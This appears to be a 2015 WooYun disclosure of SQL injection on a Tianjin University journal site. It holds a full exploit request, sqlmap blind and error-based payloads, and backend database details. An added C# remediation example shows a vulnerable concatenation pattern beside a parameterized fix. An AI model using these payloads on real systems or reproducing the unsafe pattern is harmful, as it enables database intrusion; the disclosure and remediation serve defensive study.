
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0155501

Title: SQL injection in a Tianjin University site (DBA privileges)

Vendor: tju.edu.cn

Author: 路人甲

Submitted: 2015-11-24 15:02

Fix time: 2015-11-29 15:04

Published: 2015-11-29 15:04

Type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-24: details sent to the vendor, awaiting the vendor's handling
2015-11-29: vendor chose to ignore the vulnerability; details disclosed to the public

Summary:

Details:

POST /ch/reader/wait_published_articles.aspx HTTP/1.1
Content-Length: 1977
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jmsc.tju.edu.cn
Cookie: ASP.NET_SessionId=ozyrudrrmn55mw55yrhioijr
Host: jmsc.tju.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Query=%b2%e9%d1%af&Key=-1' OR 1=1* -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=YrDgsPavTR3itvp7Dzhvy7%2btaRTZO0IhiU1kpuyY8uUAydTGLVhLXT1zX7VF%2b6FLnfwckKF6TzPWPA%2bfrcjJKENU2Jl6N5DPWZQBTgCx/2JumZkAxmEUNh554uBFBqo5CUOcxg1uPj5w9fJU9iDvgaXreHnEztZcHAZkh%2bti3uoszXod0FJsy9kf/RQrfkRHAKjFVgF8x9KhfGpb4aJ6LPP%2bjhtvDZaiwG32Rm8vTm3QD9XWsbiVjykXDlqiR%2bm14ApVfWuCHWkOHnTn7bk7kOcszvOk/i7Ij50icbBrWvwvN4AUqcrlzYY328WDx%2bvEWi4DZ0H5DmEjESKEJvjAS/NxDFy9oMhnNOtQGBl8kequwrjWGIULaNnHfQ3bYhGktfn7M2Rax62simbW735eegEFMbqmF/oJRR85Y/V9n2wWVCaPBXBTikMuXbFHx%2b5PGeUL2mEuasNiwuScVpEK%2btDqVehhtxSXnptmrB4H9xwESfr6KiNlPYTybYDWCD8afISZKGIYqfiuMMAWTDpK7NFFW4GxlDEzXmn2MYfnSr07XoMu2/s72izo/jQdkJb1v0nW9QUODGynA3xcU25WqJAsAmAPtPYVDCKvx/VkfViToS7jzhyR8O3ckjUo772UsqYc6VewAaXNklr/PuszZwsL6AVIWfKtu0qk4CMltFQ%2bddNr9jOaM4/%2bLBOZjqbuUWPaVNtUz2Y791zcp/eHzV%2be20M0cvq64bW6JdrEVF0hj5jip/klo2hiJbNZhvFqlpw27MoYKXbRydJNa1WCB3VNggC5LKNHmJGZmFo8Qe%2bLqTQL2ZaxXvnsuLeGO0IdcKvhSZ6awO0/1yVnK%2bdPwkbP/fcWZhW6ypkk3VI30/23UllpHjWKt1wS3wdKZnVU42SR7iMUbK2GHZSStwc0QQOjJ46jpOoc/awCct/3brNSpIxbdSYe%2bP%2b9FkG4PB2JvCen0nW10FrWZr4qSmA71wkJiY1XWiuvB5vQNvcOMO0UPhHKwQP8BqwxEFmvbOCjCSzFx5B4fiFYJZJP0vEyUmwruo2MZLUtDLWLi0DYe1GAGdb%2bZcLmFaScQnDKpj9pF1UntwWle6f%2biMRen9eeCN3SeJqjjVMEUzqPdkHDeYJsxZUTJqHZjk1ogm3XXnWAGaLDR4RnnEN8XLZ3b6M57V6%2blYbRe25eU%2bC3PzWpFwT7jZiImSKmt7JMZ7AhQL7XXus6AYFzZpiLfzN8oMHJMMof%2bVyj9v3eog/hJIUJIPDkbuba%2bo8h/5XS6Hm5l3ZIO9iASTAbK20HLulmVLq44pbquTaTnCeAyUKxrtIwbh4Vz24CPV%2bRhLZm1I0b%2bv0ESSDyK%2bwooLy2OlIr2MQEMIFb1Yl9uLXjuoe0seXgtNT20NYyw8z83GaMBuFzrczcxexOVYyIjfDANf7fF8cW633KyYyoy2xbf7C7BujjUYGIoJtTJfPWpYhH/MkbHLy7kKr0BNRLjJlyrEZgkg19O%2byG%2bc0go8vH2eM/4QZ4uo/H9Pk/9GxvqBJIW2zIFMxj5RgWQBXA8i6inYtmLpHgCmryIjRxWSu//Gt1nmFruQbQXNT37cRtUK2mAT256aNw1AB0q7VmbRN23gCqkaprspy820K4%2bLjJOvIOgS3XqguR7LONQr5JLesC/bU2pNUJYcoXo2DRH3akD7Mv%2b51QxoLeRxJQiKWmt6kAOgRa6uarwLfN35RIMPxNwbPnjDbCJmTdY%2by3JqObqOE11aCqRQ%3d%3d&__VIEWSTATEENCRYPTED=


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 1059=1059 -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=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&__VIEWSTATEENCRYPTED=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 2755=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2755=2755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=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&__VIEWSTATEENCRYPTED=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: jmsc_journal
[154 tables]

Proof of vulnerability:

Remediation:
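The report leaves the remediation field empty. As an added example (not code from the report or from the tju.edu.cn application, whose source is not shown), this hypothetical ASP.NET search handler contrasts the string-concatenation pattern that produces the injection seen in the Key parameter above with a parameterized version; the table, column names and the allow-list are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

// Hypothetical handler modelled on the Key/KeyList parameters in the request above.
public static class ArticleSearch
{
    // Vulnerable pattern: request values are pasted into the SQL text.
    // With Key = "-1' OR 1=1 -- " the WHERE clause becomes
    //   title LIKE '%-1' OR 1=1 -- %'
    // so the quote closes the literal and the rest is executed as SQL
    // (this is exactly what the boolean-based and error-based payloads exploit).
    public static DataTable SearchUnsafe(SqlConnection conn, string keyList, string key)
    {
        string sql = "SELECT id, title FROM t_publish_article WHERE "
                   + keyList + " LIKE '%" + key + "%'";
        var dt = new DataTable();
        new SqlDataAdapter(new SqlCommand(sql, conn)).Fill(dt);
        return dt;
    }

    // Column names cannot be bound as parameters, so the KeyList selector
    // must be checked against a fixed allow-list (values assumed here).
    private static readonly HashSet<string> AllowedColumns =
        new HashSet<string>(StringComparer.OrdinalIgnoreCase) { "title", "author", "keywords" };

    public static DataTable SearchSafe(SqlConnection conn, string keyList, string key)
    {
        if (!AllowedColumns.Contains(keyList))
            throw new ArgumentException("unsupported search field", nameof(keyList));

        // The search term is bound as a parameter: the driver sends it as data,
        // never as SQL text, so a quote or "OR 1=1" in Key is matched literally.
        string sql = "SELECT id, title FROM t_publish_article WHERE "
                   + keyList + " LIKE @pattern";
        var cmd = new SqlCommand(sql, conn);
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = "%" + key + "%";
        var dt = new DataTable();
        new SqlDataAdapter(cmd).Fill(dt);
        return dt;
    }
}
```

Because the error-based payload worked, SQL Server error text was reaching the HTTP response; enabling customErrors in web.config and running the application under a low-privilege SQL login rather than a DBA account would further limit what an injection could reveal or do.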

Copyright notice: please credit 路人甲@乌云 when reposting


Vendor response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2015-11-29 15:04

Vendor reply:

Rank: 4 (WooYun rating)

Latest status:

None yet